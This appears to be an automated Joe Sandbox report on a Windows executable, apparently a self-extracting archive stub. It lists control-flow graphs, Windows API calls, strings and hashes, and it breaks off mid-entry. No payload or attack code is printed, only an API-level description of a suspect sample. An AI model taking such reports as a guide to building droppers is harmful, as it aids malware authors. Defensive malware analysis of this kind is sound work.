                                                                                        control_flow_graph 269 370863-370886 call 37ec50 GetModuleHandleW 272 3708e7-370b48 269->272 273 370888-37089f GetProcAddress 269->273 274 370c14-370c40 GetModuleFileNameW call 36c29a call 370602 272->274 275 370b4e-370b59 call 3875fb 272->275 276 3708a1-3708b7 273->276 277 3708b9-3708c9 GetProcAddress 273->277 291 370c42-370c4e call 36b146 274->291 275->274 286 370b5f-370b8d GetModuleFileNameW CreateFileW 275->286 276->277 280 3708e5 277->280 281 3708cb-3708e0 277->281 280->272 281->280 289 370b8f-370b9b SetFilePointer 286->289 290 370c08-370c0f CloseHandle 286->290 289->290 292 370b9d-370bb9 ReadFile 289->292 290->274 298 370c50-370c5b call 37081b 291->298 299 370c7d-370ca4 call 36c310 GetFileAttributesW 291->299 292->290 295 370bbb-370be0 292->295 297 370bfd-370c06 call 370371 295->297 297->290 306 370be2-370bfc call 37081b 297->306 298->299 308 370c5d-370c7b CompareStringW 298->308 309 370ca6-370caa 299->309 310 370cae 299->310 306->297 308->299 308->309 309->291 311 370cac 309->311 312 370cb0-370cb5 310->312 311->312 314 370cb7 312->314 315 370cec-370cee 312->315 316 370cb9-370ce0 call 36c310 GetFileAttributesW 314->316 317 370cf4-370d0b call 36c2e4 call 36b146 315->317 318 370dfb-370e05 315->318 323 370ce2-370ce6 316->323 324 370cea 316->324 328 370d73-370da6 call 364092 AllocConsole 317->328 329 370d0d-370d6e call 37081b * 2 call 36e617 call 364092 call 36e617 call 37a7e4 317->329 323->316 326 370ce8 323->326 324->315 326->315 334 370df3-370df5 ExitProcess 328->334 335 370da8-370ded GetCurrentProcessId AttachConsole call 383e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->335 329->334 335->334
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(kernel32), ref: 0037087C
                                                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0037088E
                                                                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003708BF
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00370B69
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00370B83
                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00370B93
                                                                                        • ReadFile.KERNEL32(00000000,?,00007FFE,|<9,00000000), ref: 00370BB1
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00370C09
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00370C1E
                                                                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<9,?,00000000,?,00000800), ref: 00370C72
                                                                                        • GetFileAttributesW.KERNELBASE(?,?,|<9,00000800,?,00000000,?,00000800), ref: 00370C9C
                                                                                        • GetFileAttributesW.KERNEL32(?,?,D=9,00000800), ref: 00370CD8
                                                                                          • Part of subcall function 0037081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00370836
                                                                                          • Part of subcall function 0037081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0036F2D8,Crypt32.dll,00000000,0036F35C,?,?,0036F33E,?,?,?), ref: 00370858
                                                                                        • _swprintf.LIBCMT ref: 00370D4A
                                                                                        • _swprintf.LIBCMT ref: 00370D96
                                                                                          • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                        • AllocConsole.KERNEL32 ref: 00370D9E
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00370DA8
                                                                                        • AttachConsole.KERNEL32(00000000), ref: 00370DAF
                                                                                        • _wcslen.LIBCMT ref: 00370DC4
                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00370DD5
                                                                                        • WriteConsoleW.KERNEL32(00000000), ref: 00370DDC
                                                                                        • Sleep.KERNEL32(00002710), ref: 00370DE7
                                                                                        • FreeConsole.KERNEL32 ref: 00370DED
                                                                                        • ExitProcess.KERNEL32 ref: 00370DF5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                        • String ID: (=9$,<9$,@9$0?9$0A9$4B9$8>9$D=9$DXGIDebug.dll$H?9$H@9$HA9$P>9$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=9$`@9$d?9$dA9$dwmapi.dll$h=9$h>9$kernel32$uxtheme.dll$|<9$|?9$|@9$<9$>9$?9$@9$A9
                                                                                        • API String ID: 1207345701-1829638217
                                                                                        • Opcode ID: 6086db0a8babcf1a2b6c58f2e542d0210a355a10f3d75a2c75a2a43444fbe752
                                                                                        • Instruction ID: 4b3e199dabf1939c3b8ab164d5252d61f6f2933bb489d2f057b9f6564169ab09
                                                                                        • Opcode Fuzzy Hash: 6086db0a8babcf1a2b6c58f2e542d0210a355a10f3d75a2c75a2a43444fbe752
                                                                                        • Instruction Fuzzy Hash: 95D180F5408385EBDB339F50C849A9FBBECBB85708F50491DF1899A250C7B58A49CB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037C73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428windowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 348 37c73f-37c757 call 37eb78 call 37ec50 353 37d40d-37d418 348->353 354 37c75d-37c787 call 37b314 348->354 354->353 357 37c78d-37c792 354->357 358 37c793-37c7a1 357->358 359 37c7a2-37c7b7 call 37af98 358->359 362 37c7b9 359->362 363 37c7bb-37c7d0 call 371fbb 362->363 366 37c7d2-37c7d6 363->366 367 37c7dd-37c7e0 363->367 366->363 368 37c7d8 366->368 369 37c7e6 367->369 370 37d3d9-37d404 call 37b314 367->370 368->370 371 37ca5f-37ca61 369->371 372 37c9be-37c9c0 369->372 373 37c7ed-37c7f0 369->373 374 37ca7c-37ca7e 369->374 370->358 384 37d40a-37d40c 370->384 371->370 379 37ca67-37ca77 SetWindowTextW 371->379 372->370 376 37c9c6-37c9d2 372->376 373->370 377 37c7f6-37c850 call 37a64d call 36bdf3 call 36a544 call 36a67e call 366edb 373->377 374->370 380 37ca84-37ca8b 374->380 381 37c9e6-37c9eb 376->381 382 37c9d4-37c9e5 call 387686 376->382 439 37c98f-37c9a4 call 36a5d1 377->439 379->370 380->370 385 37ca91-37caaa 380->385 390 37c9f5-37ca00 call 37b48e 381->390 391 37c9ed-37c9f3 381->391 382->381 384->353 386 37cab2-37cac0 call 383e13 385->386 387 37caac 385->387 386->370 402 37cac6-37cacf 386->402 387->386 395 37ca05-37ca07 390->395 391->395 400 37ca12-37ca32 call 383e13 call 383e3e 395->400 401 37ca09-37ca10 call 383e13 395->401 422 37ca34-37ca3b 400->422 423 37ca4b-37ca4d 400->423 401->400 406 37cad1-37cad5 402->406 407 37caf8-37cafb 402->407 412 37cad7-37cadf 406->412 413 37cb01-37cb04 406->413 407->413 415 37cbe0-37cbee call 370602 407->415 412->370 418 37cae5-37caf3 call 370602 412->418 420 37cb06-37cb0b 413->420 421 37cb11-37cb2c 413->421 430 37cbf0-37cc04 call 38279b 415->430 418->430 420->415 420->421 434 37cb76-37cb7d 421->434 435 37cb2e-37cb68 421->435 427 37ca42-37ca4a call 387686 422->427 428 37ca3d-37ca3f 422->428 423->370 429 37ca53-37ca5a call 383e2e 423->429 427->423 428->427 429->370 448 37cc06-37cc0a 430->448 449 37cc11-37cc62 call 370602 call 37b1be GetDlgItem SetWindowTextW SendMessageW call 383e49 430->449 441 37cb7f-37cb97 call 383e13 434->441 442 37cbab-37cbce call 383e13 * 2 434->442 468 37cb6c-37cb6e 435->468 469 37cb6a 435->469 454 37c855-37c869 SetFileAttributesW 439->454 455 37c9aa-37c9b9 call 36a55a 439->455 441->442 460 37cb99-37cba6 call 3705da 441->460 442->430 474 37cbd0-37cbde call 3705da 442->474 448->449 453 37cc0c-37cc0e 448->453 482 37cc67-37cc6b 449->482 453->449 461 37c90f-37c91f GetFileAttributesW 454->461 462 37c86f-37c8a2 call 36b991 call 36b690 call 383e13 454->462 455->370 460->442 461->439 467 37c921-37c930 DeleteFileW 461->467 491 37c8b5-37c8c3 call 36bdb4 462->491 492 37c8a4-37c8b3 call 383e13 462->492 467->439 475 37c932-37c935 467->475 468->434 469->468 474->430 480 37c939-37c965 call 364092 GetFileAttributesW 475->480 489 37c937-37c938 480->489 490 37c967-37c97d MoveFileW 480->490 482->370 486 37cc71-37cc85 SendMessageW 482->486 486->370 489->480 490->439 493 37c97f-37c989 MoveFileExW 490->493 491->455 498 37c8c9-37c908 call 383e13 call 37fff0 491->498 492->491 492->498 493->439 498->461
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 0037C744
                                                                                          • Part of subcall function 0037B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0037B3FB
                                                                                          • Part of subcall function 0037AF98: _wcschr.LIBVCRUNTIME ref: 0037B033
                                                                                        • _wcslen.LIBCMT ref: 0037CA0A
                                                                                        • _wcslen.LIBCMT ref: 0037CA13
                                                                                        • SetWindowTextW.USER32(?,?), ref: 0037CA71
                                                                                        • _wcslen.LIBCMT ref: 0037CAB3
                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 0037CBFB
                                                                                        • GetDlgItem.USER32(?,00000066), ref: 0037CC36
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0037CC46
                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,003AA472), ref: 0037CC54
                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0037CC7F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                        • String ID: %s.%d.tmp$<br>$<7$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$7
                                                                                        • API String ID: 986293930-2680291851
                                                                                        • Opcode ID: d8cc51d5793a6fea3564100ef2452d5f0f16d715f77551936f30bb15c201780a
                                                                                        • Instruction ID: c8bae630bd7cc2a5b7f97840332e7ff8bb714ff0143c9695bd5b3b8303ffc228
                                                                                        • Opcode Fuzzy Hash: d8cc51d5793a6fea3564100ef2452d5f0f16d715f77551936f30bb15c201780a
                                                                                        • Instruction Fuzzy Hash: 62E146B2900219AADF36EB60DC85DEE73BCAF05350F44C1A5F609E7140EB789E848F60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 0036DA70
                                                                                        • _wcschr.LIBVCRUNTIME ref: 0036DA91
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0036DAAC
                                                                                          • Part of subcall function 0036C29A: _wcslen.LIBCMT ref: 0036C2A2
                                                                                          • Part of subcall function 003705DA: _wcslen.LIBCMT ref: 003705E0
                                                                                          • Part of subcall function 00371B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0036BAE9,00000000,?,?,?,00010420), ref: 00371BA0
                                                                                        • _wcslen.LIBCMT ref: 0036DDE9
                                                                                        • __fprintf_l.LIBCMT ref: 0036DF1C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$99
                                                                                        • API String ID: 557298264-3818710046
                                                                                        • Opcode ID: ff8643eacc6713d1af6dc0d51762ef72423e2393d9d6ae00abb8d9db63c04be3
                                                                                        • Instruction ID: 740e63650c5e68a25e7510583f216b97cfab7d427b468bd1972a575eb395a858
                                                                                        • Opcode Fuzzy Hash: ff8643eacc6713d1af6dc0d51762ef72423e2393d9d6ae00abb8d9db63c04be3
                                                                                        • Instruction Fuzzy Hash: 1032F376A00218DBCF26EF68C845BEE77A9FF05700F41855AF9059B289E7B1DD88CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 0037B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037B579
                                                                                          • Part of subcall function 0037B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037B58A
                                                                                          • Part of subcall function 0037B568: IsDialogMessageW.USER32(00010420,?), ref: 0037B59E
                                                                                          • Part of subcall function 0037B568: TranslateMessage.USER32(?), ref: 0037B5AC
                                                                                          • Part of subcall function 0037B568: DispatchMessageW.USER32(?), ref: 0037B5B6
                                                                                        • GetDlgItem.USER32(00000068,003BFCB8), ref: 0037D4E8
                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,0037AF07,00000001,?,?,0037B7B9,0039506C,003BFCB8,003BFCB8,00001000,00000000,00000000), ref: 0037D510
                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0037D51B
                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,003935F4), ref: 0037D529
                                                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0037D53F
                                                                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0037D559
                                                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0037D59D
                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0037D5AB
                                                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0037D5BA
                                                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0037D5E1
                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,003943F4), ref: 0037D5F0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                        • String ID: \
                                                                                        • API String ID: 3569833718-2967466578
                                                                                        • Opcode ID: be7ed52ee0a1e230a2e5af45edaa593d9b73ebeb37fae5b24ab640235166ddb4
                                                                                        • Instruction ID: 099adf2ea29e5a0841600d0b5a2fe3a2e8cb6dfdb54ec42dc0578a78322406b9
                                                                                        • Opcode Fuzzy Hash: be7ed52ee0a1e230a2e5af45edaa593d9b73ebeb37fae5b24ab640235166ddb4
                                                                                        • Instruction Fuzzy Hash: 1031D172145352AFE312EF20DC4AFAB7FACEB8A758F008518F552D6190DB64AA048776
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037D78F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 184COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 813 37d78f-37d7a7 call 37ec50 816 37d7ad-37d7b9 call 383e13 813->816 817 37d9e8-37d9f0 813->817 816->817 820 37d7bf-37d7e7 call 37fff0 816->820 823 37d7f1-37d7ff 820->823 824 37d7e9 820->824 825 37d812-37d818 823->825 826 37d801-37d804 823->826 824->823 828 37d85b-37d85e 825->828 827 37d808-37d80e 826->827 830 37d837-37d844 827->830 831 37d810 827->831 828->827 829 37d860-37d866 828->829 834 37d86d-37d86f 829->834 835 37d868-37d86b 829->835 832 37d9c0-37d9c2 830->832 833 37d84a-37d84e 830->833 836 37d822-37d82c 831->836 839 37d9c6 832->839 833->839 840 37d854-37d859 833->840 841 37d882-37d898 call 36b92d 834->841 842 37d871-37d878 834->842 835->834 835->841 837 37d82e 836->837 838 37d81a-37d820 836->838 837->830 838->836 843 37d830-37d833 838->843 846 37d9cf 839->846 840->828 849 37d8b1-37d8bc call 36a231 841->849 850 37d89a-37d8a7 call 371fbb 841->850 842->841 844 37d87a 842->844 843->830 844->841 848 37d9d6-37d9d8 846->848 853 37d9e7 848->853 854 37d9da-37d9dc 848->854 859 37d8be-37d8d5 call 36b6c4 849->859 860 37d8d9-37d8dd 849->860 850->849 858 37d8a9 850->858 853->817 854->853 857 37d9de-37d9e1 ShowWindow 854->857 857->853 858->849 859->860 863 37d8e4-37d8e6 860->863 863->853 864 37d8ec-37d8f9 863->864 865 37d90c-37d90e 864->865 866 37d8fb-37d902 864->866 867 37d925-37d944 call 37dc3b 865->867 868 37d910-37d919 865->868 866->865 869 37d904-37d90a 866->869 870 37d97b-37d987 CloseHandle 867->870 883 37d946-37d94e 867->883 868->867 876 37d91b-37d923 ShowWindow 868->876 869->865 869->870 873 37d989-37d996 call 371fbb 870->873 874 37d998-37d9a6 870->874 873->846 873->874 874->848 877 37d9a8-37d9aa 874->877 876->867 877->848 880 37d9ac-37d9b2 877->880 880->848 882 37d9b4-37d9be 880->882 882->848 883->870 884 37d950-37d961 GetExitCodeProcess 883->884 884->870 885 37d963-37d96d 884->885 886 37d974 885->886 887 37d96f 885->887 886->870 887->886
                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 0037D7AE
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 0037D8DE
                                                                                        • ShowWindow.USER32(?,00000000), ref: 0037D91D
                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 0037D959
                                                                                        • CloseHandle.KERNEL32(?), ref: 0037D97F
                                                                                        • ShowWindow.USER32(?,00000001), ref: 0037D9E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                        • String ID: .exe$.inf$PDu<7$h7$r7
                                                                                        • API String ID: 36480843-3959991556
                                                                                        • Opcode ID: 21af76e1ed4af309871876f975407c21d9e049cd621d444558af0a93592ec35c
                                                                                        • Instruction ID: 2a53ffed54ae0b84d71a8fb339aa674a5297f230fa86ac6a62655841f189c8c6
                                                                                        • Opcode Fuzzy Hash: 21af76e1ed4af309871876f975407c21d9e049cd621d444558af0a93592ec35c
                                                                                        • Instruction Fuzzy Hash: 8951D471104380AADB339B24D844BABBBF8AF86744F05841EF6C997291E7799984CB52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00383B72 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 913 383b72-383b7c 914 383bee-383bf1 913->914 915 383b7e-383b8c 914->915 916 383bf3 914->916 917 383b8e-383b91 915->917 918 383b95-383bb1 LoadLibraryExW 915->918 919 383bf5-383bf9 916->919 920 383c09-383c0b 917->920 921 383b93 917->921 922 383bfa-383c00 918->922 923 383bb3-383bbc GetLastError 918->923 920->919 924 383beb 921->924 922->920 927 383c02-383c03 FreeLibrary 922->927 925 383bbe-383bd3 call 386088 923->925 926 383be6-383be9 923->926 924->914 925->926 930 383bd5-383be4 LoadLibraryExW 925->930 926->924 927->920 930->922 930->926
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00383C35,00000000,00000FA0,003C2088,00000000,?,00383D60,00000004,InitializeCriticalSectionEx,00396394,InitializeCriticalSectionEx,00000000), ref: 00383C03
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID: api-ms-$c*8
                                                                                        • API String ID: 3664257935-3792289197
                                                                                        • Opcode ID: 63e1b4593d26f7df8fdfe3a12b41230368f583d0fa522831b0f48099dfbc7e58
                                                                                        • Instruction ID: 3d1df055f88694fcf842c7aee3e450bad10a4096b04ce67b0273ae878f51e7ba
                                                                                        • Opcode Fuzzy Hash: 63e1b4593d26f7df8fdfe3a12b41230368f583d0fa522831b0f48099dfbc7e58
                                                                                        • Instruction Fuzzy Hash: 5511CAB5A46321ABCF23AB689C41B9937689F01B70F1601A1E955FB390E771EF0087D1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 931 38a95b-38a974 932 38a98a-38a98f 931->932 933 38a976-38a986 call 38ef4c 931->933 935 38a99c-38a9c0 MultiByteToWideChar 932->935 936 38a991-38a999 932->936 933->932 940 38a988 933->940 938 38ab53-38ab66 call 37fbbc 935->938 939 38a9c6-38a9d2 935->939 936->935 941 38a9d4-38a9e5 939->941 942 38aa26 939->942 940->932 945 38aa04-38aa15 call 388e06 941->945 946 38a9e7-38a9f6 call 392010 941->946 944 38aa28-38aa2a 942->944 948 38ab48 944->948 949 38aa30-38aa43 MultiByteToWideChar 944->949 945->948 959 38aa1b 945->959 946->948 958 38a9fc-38aa02 946->958 953 38ab4a-38ab51 call 38abc3 948->953 949->948 952 38aa49-38aa5b call 38af6c 949->952 961 38aa60-38aa64 952->961 953->938 960 38aa21-38aa24 958->960 959->960 960->944 961->948 963 38aa6a-38aa71 961->963 964 38aaab-38aab7 963->964 965 38aa73-38aa78 963->965 967 38aab9-38aaca 964->967 968 38ab03 964->968 965->953 966 38aa7e-38aa80 965->966 966->948 971 38aa86-38aaa0 call 38af6c 966->971 969 38aacc-38aadb call 392010 967->969 970 38aae5-38aaf6 call 388e06 967->970 972 38ab05-38ab07 968->972 977 38ab41-38ab47 call 38abc3 969->977 983 38aadd-38aae3 969->983 970->977 985 38aaf8 970->985 971->953 986 38aaa6 971->986 976 38ab09-38ab22 call 38af6c 972->976 972->977 976->977 989 38ab24-38ab2b 976->989 977->948 988 38aafe-38ab01 983->988 985->988 986->948 988->972 990 38ab2d-38ab2e 989->990 991 38ab67-38ab6d 989->991 992 38ab2f-38ab3f WideCharToMultiByte 990->992 991->992 992->977 993 38ab6f-38ab76 call 38abc3 992->993 993->953
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003857FB,003857FB,?,?,?,0038ABAC,00000001,00000001,2DE85006), ref: 0038A9B5
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0038ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0038AA3B
                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0038AB35
                                                                                        • __freea.LIBCMT ref: 0038AB42
                                                                                          • Part of subcall function 00388E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00384286,?,0000015D,?,?,?,?,00385762,000000FF,00000000,?,?), ref: 00388E38
                                                                                        • __freea.LIBCMT ref: 0038AB4B
                                                                                        • __freea.LIBCMT ref: 0038AB70
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
